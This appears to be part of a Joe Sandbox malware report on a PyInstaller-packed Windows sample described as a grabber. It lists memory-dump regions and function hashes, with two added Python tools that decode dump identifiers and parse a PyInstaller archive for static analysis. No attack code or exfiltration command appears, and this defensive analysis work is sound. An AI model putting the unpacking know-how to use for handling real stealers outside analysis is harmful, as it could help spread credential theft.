• Associated: 00000002.00000002.1469630464.00007FF8E67F2000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6807000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6817000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E681E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E682C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6A0E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6AF9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6AFB000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6B32000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6B6F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6C3B000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6C70000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1469630464.00007FF8E6C83000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000002.00000002.1474254395.00007FF8E6C8A000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e6780000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID: )tP
• API String ID: 3300690313-3907340667
• Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
• Instruction ID: 1d0b111dc5e7b371c3a51797a1b707c7610ec9137acd374e087f5b1a5248d248
• Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
• Instruction Fuzzy Hash: E262F36262859286E7298E7CE4003BD77A0F7487C5F045532EA9EC77C4EA7CFA45CB02
APIs
Memory Dump Source
• Source File: 00000002.00000002.1488276484.00007FF8E7533000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FF8E6EE0000, based on PE: true
• Associated: 00000002.00000002.1474290394.00007FF8E6EE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E6EE1000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E71B6000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E71C5000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E71CF000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E7211000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E72E0000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E73EB000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E73EF000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E7436000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E743E000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E747F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E74B3000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E74DD000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E74F2000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1474323542.00007FF8E752C000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1488411064.00007FF8E7535000.00000004.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e6ee0000_SecuriteInfo.jbxd
Similarity
• API ID: ProtectVirtual$AddressLibraryLoadProc
• String ID:
• API String ID: 3300690313-0
• Opcode ID: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
• Instruction ID: afe4e88a0c68e409f920016b234c66c1caa4b616ddfeba167d62b49d52dd9b0a
• Opcode Fuzzy Hash: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B62496262819297E7158F78D80037D77A0F748BC5F445635EAAEC37E8EA3CEA45C701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                              • Opcode ID: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
                                                                                                                                                                                                                              • Instruction ID: 859cf0204132fb28497458200b37ed980035cb7eb1d6f78409288bd25d94eafe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E62027262829A86E7198A78D4003BD77A0F7487C5F145932EA9EC37C4EB7CEA45CB05
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                              • Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                              • Instruction ID: 6371b7943ab6f91588fccbba32fb11e26f9483dfa1a07767d8623d4a43d25965
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 846238A27281968AF7158E78E5013BE7790F7487C5F045532EAAEC37C4EA7CEA45CB01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                              • Opcode ID: 78706b716399f285c8c84bf0c82d6c966be19b62f32ef2710452d50c9fcab11e
                                                                                                                                                                                                                              • Instruction ID: 864c04d11b8ed08595801902da3eeea541c4cecf9baa93cd6e4a1b44d2f106c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78706b716399f285c8c84bf0c82d6c966be19b62f32ef2710452d50c9fcab11e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C56204626281968BEF298A78D40037E6790F7587C5F085532FAAEC37C4EB7CEA45C705
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: bind
                                                                                                                                                                                                                              • String ID: bind$socket.bind
                                                                                                                                                                                                                              • API String ID: 1187836755-187351271
                                                                                                                                                                                                                              • Opcode ID: 4ce2c3a6d91a333172a2df15937caee8bf14d916a7314e4ad852e3007f95126b
                                                                                                                                                                                                                              • Instruction ID: e6363be6ea6afdfa36a136f80d102604c48e89a5de1903f4f3e1ef628452bec3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ce2c3a6d91a333172a2df15937caee8bf14d916a7314e4ad852e3007f95126b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA113A61A18B8282E6209BA2F8443EE7364FF49BC5F060132DE8D47B59EF3CE445C709
                                                                                                                                                                                                                              APIs
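The memory-dump identifiers listed in these entries carry the region metadata an analyst needs when triaging them (base address, page protection, module membership). The following decoder is an added example and is not Joe Sandbox code; the eight-field layout is read off the names above, the protection values decode cleanly against the documented Win32 PAGE_* constants and 0x01000000 matches MEM_IMAGE, while the process-index, round, dump-id and module-index labels are assumptions inferred from the listing (the snapshot names hcaresult_2_2_* suggest the first two fields). It groups the regions of module 0x0C, the module that also holds the bind/socket.bind function above, and surfaces the image pages that are both writable and executable, which are the ones to diff against the on-disk section when a VirtualProtect/LoadLibrary/GetProcAddress stub lives nearby.

```python
"""Decode Joe Sandbox .sdmp region identifiers (added example, not sandbox code).

Field meanings marked ASSUMED are inferred from this report's listing, not
documented Joe Sandbox semantics. Protection and type values are checked
against the documented winnt.h constants.
"""
import re
from dataclasses import dataclass

# Documented Win32 page-protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x01000000  # documented MEM_IMAGE value (winnt.h)

# Eight dot-separated fields followed by ".sdmp", as seen in the listing.
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int  # ASSUMED: analysed process index (cf. hcaresult_2_2_* names)
    dump_round: int     # ASSUMED: dump round within the analysis
    dump_id: int        # ASSUMED: per-dump sequence number
    base: int           # region base virtual address
    protect: int        # page protection; values match PAGE_* constants
    field6: int         # meaning unknown; kept verbatim
    mem_type: int       # 0x01000000 matches MEM_IMAGE
    module_index: int   # ASSUMED: index of the PE module owning the region

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"0x{self.protect:08X}")

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE

    @property
    def writable_and_executable(self) -> bool:
        # RWX or COW-writable executable pages.
        return self.protect in (0x40, 0x80)


def parse_sdmp(name: str) -> DumpRegion:
    """Split one identifier into typed fields; raise on anything else."""
    m = _SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp identifier: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16), dump_round=int(m["round"], 16),
        dump_id=int(m["dump"]), base=int(m["base"], 16),
        protect=int(m["protect"], 16), field6=int(m["f6"], 16),
        mem_type=int(m["mtype"], 16), module_index=int(m["module"], 16),
    )


def group_by_module(names: list[str]) -> dict[int, list[DumpRegion]]:
    """Group regions by module index, ordered by base address inside each module."""
    groups: dict[int, list[DumpRegion]] = {}
    for n in names:
        r = parse_sdmp(n)
        groups.setdefault(r.module_index, []).append(r)
    for regs in groups.values():
        regs.sort(key=lambda r: r.base)
    return groups


def rwx_image_regions(names: list[str]) -> list[DumpRegion]:
    """Image-backed regions that are writable and executable at dump time."""
    return [r for r in map(parse_sdmp, names) if r.is_image and r.writable_and_executable]


# Identifiers copied from the module 0x0C entry in this report (not constructed).
MODULE_0C_DUMPS = [
    "00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp",
    "00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp",
    "00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp",
    "00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp",
    "00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp",
    "00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp",
    "00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp",
]

if __name__ == "__main__":
    for idx, regs in group_by_module(MODULE_0C_DUMPS).items():
        print(f"module {idx:#x}")
        for r in regs:
            print(f"  {r.base:#018x}  {r.protection_name:24s}  image={r.is_image}")
    print("writable+executable:", [f"{r.base:#x}" for r in rwx_image_regions(MODULE_0C_DUMPS)])
```

Run against the module 0x0C list the script reports the header page as PAGE_READONLY, the data page as PAGE_READWRITE and five writable-plus-executable pages. Whether a 0x40 image page reflects a section the PE headers already mark RWX or a runtime VirtualProtect is not something the identifier alone settles; compare the dumped bytes with the on-disk section before drawing a conclusion.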

Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: 8ce2ad7dbfd5054e07d43efbcfa513b8df1537611b836527035957cd2eb09776
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: 9DF0C232A1C74286F7A0DB60B4D8766B390FB84728F840336DA6D02AD8DF3CE058CA11
APIs

Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                              • Opcode ID: cc5000ffc5fa2b87bdd8153e65a94afe1c8ba3f92a28fb82bdbbf04857ba9e65
                                                                                                                                                                                                                              • Instruction ID: 25758588b687cbfffc562908e67abe12b4e5ecd2d8aeff69cf3a38c2df916349
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc5000ffc5fa2b87bdd8153e65a94afe1c8ba3f92a28fb82bdbbf04857ba9e65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42E01AF2A10A4582D7145B56E0402687360F719FE4F245721CA781B3D0DE28D5E5C740

Control-flow Graph (function starting at 00007FF7EAD01950; rendered as an image with an executed/not-executed block legend, basic-block list not reproduced)
APIs
  • Part of subcall function 00007FF7EAD07F90: _fread_nolock.LIBCMT ref: 00007FF7EAD0803A
• _fread_nolock.LIBCMT ref: 00007FF7EAD01A1B
  • Part of subcall function 00007FF7EAD02910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7EAD01B6A), ref: 00007FF7EAD0295E
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 3ff95809ca1090418fbd1d21d944a3955d2264a87fb5bf50133219bb90c93b1a
• Instruction ID: 3adfd0fecca65c1dac41dd60b8d855fbfba640b4b7d0e82ba3b7333a87dcf31f
• Opcode Fuzzy Hash: 3ff95809ca1090418fbd1d21d944a3955d2264a87fb5bf50133219bb90c93b1a
• Instruction Fuzzy Hash: 1C817271A0868686FB20FB24D0853B9E3A2EF48748F844477E98D4778DDE7CE585C762
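
The strings of this function (MEI, Failed to read cookie!, Failed to seek to cookie position!, Could not read full TOC!) are the error messages of the PyInstaller bootloader's archive reader, and the _fread_nolock calls are it reading the cookie and then the table of contents. The sample is therefore a PyInstaller-packed Python program, which also explains why the module mapped at 00007FF8E8130000 carries CPython _socket strings (socket.__new__, socket.getaddrinfo) in the functions that follow. Pulling the grabber's scripts and PYZ out for static analysis means walking the same structure. The parser below is an added example, not code from this report or from PyInstaller: the cookie and TOC layouts follow PyInstaller's public bootloader headers, and it is an assumption that this sample's archive uses that current, big-endian, 88-byte cookie layout (older bootloaders used a shorter cookie). The archive it parses is constructed in-line so the example runs offline; the entry names and payloads in it are made up.

```python
"""Walk a PyInstaller onefile archive the way the bootloader function above does.

Added example, not code from the sandbox report or from PyInstaller. The cookie
and TOC layouts follow PyInstaller's public bootloader headers (pyi_archive.h);
that this sample's archive uses this (current, big-endian) layout is an assumption.
"""
import struct
import zlib
from dataclasses import dataclass

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"            # the "MEI" cookie magic
COOKIE_FMT = ">8sIIii64s"                      # magic, len, TOC, TOClen, pyvers, pylibname
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)      # 88 bytes, every field big-endian
TOC_HDR_FMT = ">iIIIcc"                        # structlen, pos, len, ulen, cflag, typcd
TOC_HDR_SIZE = struct.calcsize(TOC_HDR_FMT)    # 18 bytes; NUL-padded name follows
TYPE_CODES = {"b": "binary", "z": "PYZ archive", "m": "module", "s": "script",
              "x": "data", "o": "runtime option", "d": "dependency"}


@dataclass
class TocEntry:
    name: str
    offset: int        # absolute file offset of the stored (maybe compressed) data
    clen: int          # stored length
    ulen: int          # uncompressed length
    compressed: bool   # cflag == 1 means zlib
    typcd: str


def find_cookie(blob: bytes) -> int:
    """Offset of the cookie. Searched from the end, as the bootloader does,
    because an Authenticode signature or other trailer may follow the archive."""
    pos = blob.rfind(MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(blob):
        raise ValueError("Failed to read cookie!")
    return pos


def parse_archive(blob: bytes):
    """Return (cookie fields, package start offset, TOC entries)."""
    cookie_pos = find_cookie(blob)
    _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, blob, cookie_pos)
    cookie = {"len": pkg_len, "toc": toc_off, "toclen": toc_len,
              "pyvers": pyvers, "pylib": pylib.rstrip(b"\x00").decode()}
    # 'len' spans the whole package including the cookie itself, so the
    # package begins len bytes before the end of the cookie.
    pkg_start = cookie_pos + COOKIE_SIZE - pkg_len
    if pkg_start < 0:
        raise ValueError("cookie claims a package larger than the file")
    toc_start, toc_end = pkg_start + toc_off, pkg_start + toc_off + toc_len
    if toc_end > cookie_pos:
        raise ValueError("Could not read full TOC!")
    entries, off = [], toc_start
    while off < toc_end:
        structlen, pos, clen, ulen, cflag, typcd = struct.unpack_from(TOC_HDR_FMT, blob, off)
        if structlen < TOC_HDR_SIZE or off + structlen > toc_end:
            raise ValueError("malformed TOC entry at offset %d" % off)
        name = blob[off + TOC_HDR_SIZE:off + structlen].rstrip(b"\x00").decode("utf-8")
        entries.append(TocEntry(name, pkg_start + pos, clen, ulen, cflag == b"\x01", typcd.decode()))
        off += structlen
    return cookie, pkg_start, entries


def read_entry(blob: bytes, entry: TocEntry) -> bytes:
    """Extract one entry, inflating it when the TOC flags it as compressed."""
    raw = blob[entry.offset:entry.offset + entry.clen]
    if len(raw) != entry.clen:
        raise ValueError("entry %s runs past the end of the file" % entry.name)
    data = zlib.decompress(raw) if entry.compressed else raw
    if len(data) != entry.ulen:
        raise ValueError("entry %s: uncompressed length mismatch" % entry.name)
    return data


def build_sample_archive(files, stub=b"MZ" + b"\x00" * 62) -> bytes:
    """Constructed demo input in the same layout; the stub is not a real PE."""
    data, toc = bytearray(), bytearray()
    for name, typcd, payload, compress in files:
        stored = zlib.compress(payload) if compress else payload
        nm = name.encode("utf-8") + b"\x00"
        structlen = TOC_HDR_SIZE + len(nm)
        structlen += (-structlen) % 16             # entries are padded to 16 bytes
        toc += struct.pack(TOC_HDR_FMT, structlen, len(data), len(stored), len(payload),
                           b"\x01" if compress else b"\x00", typcd.encode())
        toc += nm.ljust(structlen - TOC_HDR_SIZE, b"\x00")
        data += stored
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), 311,
                         b"python311.dll".ljust(64, b"\x00"))
    return bytes(stub + data + toc + cookie)


SAMPLE = build_sample_archive([                 # constructed input, not the real sample
    ("pyiboot01_bootstrap", "m", b"# constructed bootstrap module\n", True),
    ("stub", "s", b"import os\nprint('constructed sample script')\n", True),
    ("python311.dll", "b", b"not a real DLL, constructed payload", False),
])

if __name__ == "__main__":
    cookie, start, entries = parse_archive(SAMPLE)
    print("package at 0x%x, Python %d.%d, %s" % (start, cookie["pyvers"] // 100,
                                                 cookie["pyvers"] % 100, cookie["pylib"]))
    for e in entries:
        print("%-20s %-14s %6d -> %6d bytes" % (e.name, TYPE_CODES.get(e.typcd, e.typcd), e.clen, e.ulen))
```

To run it on a real sample, pass the file bytes instead of SAMPLE (`parse_archive(open(path, "rb").read())`). Entries of type s are the entry-point scripts and the z entry is the PYZ holding the compiled modules; a grabber's configuration normally lives in one of those. The parser only trusts the cookie's len after checking that it fits inside the file, and the TOC walk refuses any entry whose structlen would step outside the table, so a truncated or tampered archive fails with an error rather than a wild read.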

Control-flow Graph (function starting at 00007FF8E8135E54; rendered as an image with an executed/not-executed block legend, basic-block list not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
• String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
• API String ID: 141981615-2881308447
• Opcode ID: 4f2beb27c7ea7289d8515a14bf3cfdd75d59c501fe0f98bb6e87318c8562a854
• Instruction ID: 9dd8410dde2ae0ea03569deed8a9735ad7c037c870b08055c7a2596afa9bfe40
